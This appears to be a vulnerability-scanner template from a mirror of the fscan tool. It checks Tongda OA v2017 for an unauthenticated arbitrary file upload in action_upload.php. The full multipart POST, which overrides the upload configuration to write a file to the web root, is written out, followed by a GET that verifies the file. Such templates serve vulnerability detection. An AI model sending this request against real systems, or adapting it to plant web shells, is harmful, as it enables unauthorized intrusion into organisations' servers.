mirror of https://github.com/qwqdanchun/fscan.git
51 lines
1.9 KiB
YAML
51 lines
1.9 KiB
YAML
name: tongda-v2017-uploadfile
|
|
set:
|
|
rand1: randomLowercase(12)
|
|
fileContent: randomLowercase(12)
|
|
rules:
|
|
- method: POST
|
|
path: /module/ueditor/php/action_upload.php?action=uploadfile
|
|
headers:
|
|
Content-Type: multipart/form-data; boundary=55719851240137822763221368724
|
|
body: |
|
|
-----------------------------55719851240137822763221368724
|
|
Content-Disposition: form-data; name="CONFIG[fileFieldName]"
|
|
|
|
ffff
|
|
-----------------------------55719851240137822763221368724
|
|
Content-Disposition: form-data; name="CONFIG[fileMaxSize]"
|
|
|
|
1000000000
|
|
-----------------------------55719851240137822763221368724
|
|
Content-Disposition: form-data; name="CONFIG[filePathFormat]"
|
|
|
|
tcmd
|
|
-----------------------------55719851240137822763221368724
|
|
Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]"
|
|
|
|
.txt
|
|
-----------------------------55719851240137822763221368724
|
|
Content-Disposition: form-data; name="ffff"; filename="{{rand1}}.txt"
|
|
Content-Type: application/octet-stream
|
|
|
|
{{fileContent}}
|
|
-----------------------------55719851240137822763221368724
|
|
Content-Disposition: form-data; name="mufile"
|
|
|
|
submit
|
|
-----------------------------55719851240137822763221368724--
|
|
expression: |
|
|
response.status == 200
|
|
- method: GET
|
|
path: /{{rand1}}.txt
|
|
expression: |
|
|
response.status == 200 && response.body.bcontains(bytes(fileContent))
|
|
detail:
|
|
author: zan8in
|
|
description: |
|
|
通达OA v2017 action_upload.php 任意文件上传漏洞
|
|
通达OA v2017 action_upload.php 文件过滤不足且无需后台权限,导致任意文件上传漏洞
|
|
app="TDXK-通达OA"
|
|
links:
|
|
- http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v2017%20action_upload.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html
|